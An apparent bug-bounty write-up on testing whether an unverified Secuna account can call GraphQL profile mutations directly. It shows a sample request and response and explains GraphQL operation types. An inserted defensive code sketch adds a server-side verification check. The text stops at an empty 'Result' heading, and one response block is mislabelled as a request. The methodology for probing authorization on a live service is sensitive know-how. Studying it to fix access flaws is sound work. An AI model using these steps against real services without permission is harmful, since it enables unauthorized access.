Details #
Currently I have 2 accounts at Secuna.
- https://app.secuna.io/ctulhu – Verified
- https://app.secuna.io/imongmama – Not Verified
As a verified user in Secuna, you should be able to update your profile, submit reports, view disclosed reports, and update your payout method. If your account is not verified, you should not be able to submit reports, view disclosed reports, update your profile, etc.
If you log in using a non-verified Secuna account, you will only be redirected to https://app.secuna.io/account-verification
Since I already mapped out Secuna’s GraphQL endpoint (https://app.secuna.io/static/js/main.80713d8f.chunk.js)
Sample GraphQL Request: #
Server Request
POST /api/graphql HTTP/1.1
Host: app.secuna.io
content-type: application/json
authorization: Bearer

{"operationName":"updateAboutHackerProfile","variables":{"bio":"meh","location":"Philippines","website":"https://ctulhu.me"},"query":"mutation updateAboutHackerProfile($bio: String!, $location: String, $website: String) {\n updateAboutHackerProfile(bio: $bio, location: $location, website: $website) {\n bio\n location\n socialMedia {\n github\n website\n facebook\n linkedin\n instagram\n }\n }\n}\n"}
This updates my bio to “meh”, my location to “Philippines”, and my website to “https://ctulhu.me”. The operation type is “mutation”, which performs a write followed by a fetch of bio, location, and socialMedia (github, website, etc.).
GraphQL Operations #
In GraphQL there are 3 types of operations:
- query: a read‐only fetch.
- mutation: a write followed by a fetch.
- subscription: a long‐lived request that fetches data in response to source events.
Each operation is represented by an optional operationName and a selection set. If we send the above request, we will receive the response below.
Server response
POST /api/graphql HTTP/1.1
Host: app.secuna.io
content-type: application/json
authorization: Bearer

{"data":{"updateAboutHackerProfile":{"bio":"meh","location":"Philippines","socialMedia":{"facebook":null,"github":null,"instagram":null,"linkedin":null,"website":"https://ctulhu.me"}}}}
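The access rule described above (a non-verified account must not update its profile) only holds if the server checks it when the mutation executes, because a redirect in the web app does not cover requests sent directly to /api/graphql. A sketch of that server-side check, as an added example that is not Secuna's code: the `verified` flag on the request context, `requireVerified`, `runMutation` and the in-memory profile store are assumptions.

```javascript
// Added example; ctx.user.verified, requireVerified and runMutation are assumed names.

class ForbiddenError extends Error {
  constructor(message) {
    super(message);
    this.extensions = { code: "FORBIDDEN" };
  }
}

// Wrap a resolver so the verification check runs on the server for every call,
// whether the request came from the UI or was sent straight to /api/graphql.
function requireVerified(resolver) {
  return function (parent, args, ctx, info) {
    if (!ctx || !ctx.user) throw new ForbiddenError("authentication required");
    // Fail closed: anything other than an explicit true counts as unverified.
    if (ctx.user.verified !== true) throw new ForbiddenError("account not verified");
    return resolver(parent, args, ctx, info);
  };
}

// Constructed in-memory store standing in for the profile table.
const profiles = new Map([
  ["ctulhu", { bio: "", location: null, socialMedia: { website: null } }],
  ["imongmama", { bio: "", location: null, socialMedia: { website: null } }],
]);

function updateAboutHackerProfile(_parent, { bio, location, website }, ctx) {
  const p = profiles.get(ctx.user.username);
  Object.assign(p, { bio, location });
  p.socialMedia.website = website;
  return p;
}

// Default-deny for writes: every mutation is wrapped when the map is built,
// so a newly added mutation cannot ship without the check.
const mutations = { updateAboutHackerProfile };
const Mutation = Object.fromEntries(
  Object.entries(mutations).map(([name, fn]) => [name, requireVerified(fn)])
);

// Minimal dispatcher standing in for the GraphQL executor (constructed).
function runMutation(name, variables, ctx) {
  try {
    return { data: { [name]: Mutation[name](null, variables, ctx, null) } };
  } catch (err) {
    return { data: null, errors: [{ message: err.message, extensions: err.extensions }] };
  }
}
```

Wrapping at the resolver map rather than in each resolver body keeps the check in one place and makes a missing check visible in review.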
Result #